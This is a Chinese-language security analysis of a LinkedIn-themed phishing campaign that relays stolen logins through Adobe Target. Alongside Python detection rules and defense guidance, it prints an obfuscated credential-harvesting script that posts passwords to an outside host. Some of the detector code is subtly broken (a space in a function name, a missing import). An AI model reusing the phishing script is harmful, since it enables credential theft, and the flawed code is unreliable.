摘要
近期出现针对职场人群的规模化领英(LinkedIn)主题钓鱼攻击,攻击者以商业合作为诱饵,通过双后缀伪装、代码混淆、预填邮箱、合法云服务跳转等多层欺骗手段,滥用 Adobe Target(A/B 测试平台)作为流量中转与行为追踪节点,将恶意流量伪装成合法 Adobe 业务请求,大幅提升攻击隐蔽性与成功率。攻击依托omtrdc.net域名分发钓鱼流量,窃取用户凭证后跳转至真实领英页面,实现无感窃密与逃逸检测。本文以该事件为实证样本,系统拆解攻击全流程、社会工程逻辑、代码混淆机制、云服务滥用原理与流量逃逸策略,提供可复现的代码示例与检测规则,构建覆盖邮件网关、终端行为、云服务审计、身份安全的闭环防御体系。反网络钓鱼技术专家芦笛指出,依托合法云服务做流量中继的钓鱼模式正快速普及,传统基于域名、IP、特征库的防护手段失效,必须转向行为链、业务流、云侧审计的多维协同检测。
1 引言
职场社交平台因用户身份真实、权限集中、数据敏感,成为定向钓鱼的高频目标。2026 年 5 月,安全厂商披露针对 LinkedIn 用户的新型钓鱼攻击:攻击者伪装商业合作邀约,附件以双后缀伪装为 PDF,内含混淆 HTML 钓鱼页面;页面预填受害者邮箱提升可信度,提交后通过 Adobe Target 合法域名中转,既追踪转化效果又隐藏恶意源头,最终窃取账号密码并跳转官方网站完成逃逸。该攻击具备低门槛、高仿真、强隐蔽、可规模化四大特征,对企业员工账号、客户数据、内部系统构成严重威胁。
现有研究多聚焦钓鱼邮件文本分类、恶意 URL 识别、页面克隆检测,对合法云服务中继、双后缀文件伪装、代码混淆、行为追踪一体化的新型攻击机理研究不足,尤其缺少工程化检测与防御方案。本文以实证事件为核心,还原攻击链路、剖析关键技术、给出代码级检测与防护方法,为企业抵御职场定向钓鱼提供理论与实践支撑。
2 攻击事件概况与核心特征
2.1 事件基本情况
本次攻击以职场人群为目标,通过钓鱼邮件批量投放,核心要素如下:
诱饵场景:伪装海外采购商合作请求,附件标注 “已签署合同”,诱导打开;
附件伪装:真实文件为xxx.pdf.html,双后缀诱导系统与用户识别为 PDF;
页面欺骗:打开后显示高仿 LinkedIn 登录页,邮箱预填不可修改,降低戒备;
云服务滥用:借助 Adobe Target(tt.omtrdc.net)中转流量,伪装合法请求;
行为追踪:攻击者通过中转平台统计点击与提交率,优化攻击话术与投放;
无感逃逸:窃取凭证后跳转真实 LinkedIn,无异常弹窗,难被用户察觉。
2.2 攻击核心特征总结
社会工程高度场景化:贴合 B2B 沟通习惯,话术专业、诱饵合理,信任成本极低;
文件伪装多层迷惑:双后缀 + 图标 + 混淆代码,绕过网关与人工检查;
页面交互心理诱导:预填邮箱制造 “官方已识别” 错觉,提升提交意愿;
合法云服务做掩护:流量走向 Adobe 可信域名,传统黑名单无法拦截;
攻击闭环可规模化:模板化、自动化、可追踪,支持大规模群发与效果迭代。
反网络钓鱼技术专家芦笛强调,此类攻击的核心威胁在于用合法基础设施干恶意之事,安全系统易因信任云厂商而放行,形成防御盲区。
3 攻击全流程拆解
3.1 攻击链路(六阶段)
邮件构造与投放
伪造真实存在的企业与联系人,发送含 “合同编号、采购数量” 的商务邮件,降低可疑度。
附件双后缀伪装
文件名设为Contract_33110.pdf.html,Windows 默认隐藏后缀,显示为Contract_33110.pdf。
混淆代码执行
用户打开后,混淆 JS 解码,渲染高仿登录页,邮箱预填并锁定不可编辑。
凭证输入与上传
用户输密码提交,数据先经 Adobe Target 接口中转,再发往攻击者服务器。
行为统计与追踪
攻击者通过中转日志统计点击 / 提交转化率,迭代钓鱼文案与页面。
无感跳转逃逸
后台窃取完成后,自动跳转到官方 LinkedIn,用户无感知,难触发告警。
3.2 关键欺骗点分析
预填邮箱:利用锚定效应,强化页面官方属性;
锁定邮箱:防止测试输入,提升数据有效性;
合法中转:流量走向 Adobe,绕过边界检测;
无痕跳转:无报错、无滞留,降低事后追溯概率。
4 核心技术机理与代码示例
4.1 双后缀文件伪装与检测
def check_double_extension(filename: str) -> dict:
"""
检测双后缀伪装文件(如pdf.html、doc.js)
返回:风险标识、后缀链、原因
"""
result = {"risk": False, "extensions": [], "reason": ""}
parts = filename.strip().split('.')
if len(parts) >= 3:
exts = parts[-2:]
ext1, ext2 = exts[0].lower(), exts[1].lower()
# 高风险组合:常见文档后缀 + 可执行/脚本后缀
risky_pairs = {
("pdf", "html"), ("doc", "html"), ("xls", "html"),
("pdf", "js"), ("doc", "js"), ("pdf", "exe")
}
if (ext1, ext2) in risky_pairs:
result["risk"] = True
result["extensions"] = [ext1, ext2]
result["reason"] = "双后缀伪装:文档类+脚本类组合"
return result
应用场景:邮件网关、EDR、文件沙箱前置过滤,拦截高风险伪装附件。
4.2 HTML 钓鱼页面混淆与还原机制
// 攻击使用的典型混淆代码(简化版)
// 1. Base64分段编码 + URL编码
var a = "dmFyIGU9ZG9jdW1lbnQ=";
var b = "LmNyZWF0ZUVsZW1lbnQ";
var c = "Ao9KCkpeHA=";
// 2. 拼接解码
var d = decodeURIComponent(escape(atob(a + b + c)));
eval(d);
// 解码后核心逻辑(模拟)
function renderFakeLogin() {
// 预填受害者邮箱并禁用编辑
document.getElementById("email").value = "victim@company.com";
document.getElementById("email").setAttribute("readonly", true);
// 提交劫持
document.getElementById("form").onsubmit = function(e) {
e.preventDefault();
var pwd = document.getElementById("password").value;
// 经由Adobe Target中转上传
fetch("https://lnkd.tt.omtrdc.net/rest/v1/delivery", {
method: "POST",
body: JSON.stringify({ user: "victim@company.com", pwd: pwd })
}).then(() => {
// 无感跳转到官方LinkedIn
window.location.href = "https://www.linkedin.com/login";
});
};
}
防御要点:对 HTML 附件做静态混淆检测、动态解码沙箱、行为模拟执行。
4.3 云服务滥用流量检测
import re
def detect_abused_adobe_target(url: str, referer: str = "") -> dict:
"""
检测Adobe Target接口被钓鱼滥用的异常请求
"""
result = {"risk": False, "reason": "", "score": 0}
# 规则1:钓鱼典型域名路径
if re.search(r"lnkd\.tt\.omtrdc\.net", url, re.I):
result["score"] += 40
result["reason"] += "异常子域名组合;"
# 规则2:携带账号密码类参数
if re.search(r"user|account|pwd|password", url, re.I):
result["score"] += 35
result["reason"] += "URL携带敏感凭证参数;"
# 规则3:来源非合法业务页面
if not referer or not re.search(r"linkedin\.com|adobe\.com", referer, re.I):
result["score"] += 25
result["reason"] += "异常来源页面;"
# 综合判定
if result["score"] >= 60:
result["risk"] = True
return result
部署位置:代理网关、Nginx/ATS 日志审计、SOAR、云安全访问代理(CASB)。
4.4 预填邮箱钓鱼页面识别
from bs4 import BeautifulSoup
def detect_pre filled_phish(html_content: str) -> dict:
"""
检测预填邮箱的高仿登录钓鱼页面
"""
result = {"risk": False, "reason": "", "score": 0}
soup = BeautifulSoup(html_content, "html.parser")
inputs = soup.find_all("input")
for inp in inputs:
ty = inp.get("type", "")
val = inp.get("value", "")
ro = inp.get("readonly", "")
# 规则:邮箱格式 + 预填value + 只读
if ty == "email" and re.match(r"^[\w\.-]+@[\w\.-]+\.\w+$", val) and ro:
result["score"] += 50
result["reason"] = "预填邮箱并锁定输入框;"
# 规则:同时存在密码框
pw = soup.find("input", {"type": "password"})
if pw:
result["score"] += 30
result["reason"] += "含密码输入框;"
if result["score"] >= 70:
result["risk"] = True
return result
作用:浏览器扩展、沙箱、邮件附件扫描,精准识别高仿真钓鱼页。
5 攻击危害与防御痛点
5.1 多维安全危害
账号泄露风险:窃取 LinkedIn 凭证,用于撞库、内部渗透、商业情报窃取;
企业数据泄露:联系人、商机、内部沟通记录被批量爬取;
横向渗透入口:以职场邮箱为跳板,发起鱼叉式钓鱼、勒索软件传播;
品牌信任损害:伪造合作请求,破坏企业对外商业信誉;
合规处罚风险:客户数据泄露触发 GDPR、个人信息保护法等处罚。
5.2 传统防御失效原因
云服务白名单绕过:Adobe 为可信厂商,流量默认放行;
文件伪装难识别:双后缀 + 混淆代码,绕过静态特征;
页面高度仿真:视觉与交互接近官方,人工与机器难区分;
行为无痕逃逸:提交即跳转,无落地恶意文件、无持久化痕迹;
攻击链路分散:邮件、附件、云中转、恶意服务器分属不同环节,难以全局关联。
反网络钓鱼技术专家芦笛强调,防御此类攻击必须放弃单点检测,转向全链路行为建模 + 云侧异常审计 + 身份侧风险校验的组合策略。
6 面向云服务滥用钓鱼的闭环防御体系
6.1 邮件与文件层防护
双后缀文件强制拦截:对pdf.html等高风险组合直接隔离;
混淆代码深度检测:对 HTML/JS 做解码、沙箱执行、行为识别;
发件人异常校验:检查姓名、公司、职位、域名一致性,拦截伪造头像;
诱饵关键词识别:对 “合同、订单、采购、签约” 等搭配附件加强检测。
6.2 云服务与流量层防护
Adobe Target 异常使用审计:监控omtrdc.net异常子域名、敏感参数、非官方来源;
云厂商 API 调用管控:限制个人 / 非认证应用调用业务接口;
代理网关规则升级:对中转类可信域名做参数与行为检测;
威胁情报共享:建立云服务钓鱼中继 IOC 库,跨厂商同步。
6.3 页面与终端层防护
预填邮箱钓鱼页识别:部署上述代码检测规则,浏览器插件实时拦截;
异常表单提交监控:禁止向云测试接口发送账号密码;
终端文件行为监控:HTML 文件自动发起网络请求视为高风险。
6.4 身份与账户层防护
强制启用 MFA:降低单一凭证泄露危害;
异常登录检测:异地、新设备、高频失败触发二次验证;
登录提醒全渠道推送:邮件、App、短信实时通知;
凭证泄漏快速响应:支持一键挂失、强制改密、会话下线。
6.5 治理与运营层防护
员工场景化培训:针对 B2B 钓鱼、合同附件、领英沟通做专项演练;
云服务商责任强化:建立滥用快速关停、异常检测、溯源机制;
跨机构协同处置:安全厂商、邮箱平台、云厂商、社交平台情报联动;
7×24 小时监测响应:对职场钓鱼高频场景实时处置。
反网络钓鱼技术专家芦笛强调,闭环防御的关键是可信服务不可信化检测,即使流量来自 Adobe、微软、谷歌等顶级厂商,仍需做参数、行为、来源的深度校验。
7 工程化落地建议
网关侧:部署双后缀检测、URL 参数检测、云服务异常请求规则;
终端侧:推送浏览器防钓鱼扩展,启用预填邮箱页面识别;
云侧:接入 CASB,监控 Adobe 等测试平台异常调用;
身份侧:全员开启 MFA,配置高频告警与自动封禁策略;
管理侧:每季度开展职场钓鱼演练,更新钓鱼特征库。
8 结论
基于 Adobe Target 滥用的 LinkedIn 主题钓鱼,代表了下一代定向钓鱼的主流方向:合法云服务做中继、社会工程深度场景化、文件与页面多层伪装、行为无痕逃逸。攻击精准命中传统防御盲区,对企业与个人数据安全构成现实威胁。
本文通过实证分析得出结论:
云服务滥用使钓鱼流量具备合法外衣,单一黑名单 / 特征库完全失效;
双后缀、代码混淆、预填邮箱、无感跳转组合使用,大幅提升转化率与隐蔽性;
有效防御必须构建邮件 — 文件 — 流量 — 云 — 身份 — 终端全链路闭环;
防御核心是从特征检测转向行为链检测、业务合规性校验、云侧异常审计。
反网络钓鱼技术专家芦笛指出,随着云服务普及,利用合法平台做恶意中继将成为黑产标配,企业需尽快建立 “零信任” 流量校验机制,对所有云请求做深度审计,才能持续抵御此类高级钓鱼攻击。
未来研究可聚焦云服务 API 滥用行为建模、多阶段攻击关联分析、混淆代码自动解码与检测、职场场景钓鱼语义理解等方向,为构建更稳健的防御体系提供支撑。
编辑:芦笛(公共互联网反网络钓鱼工作组)
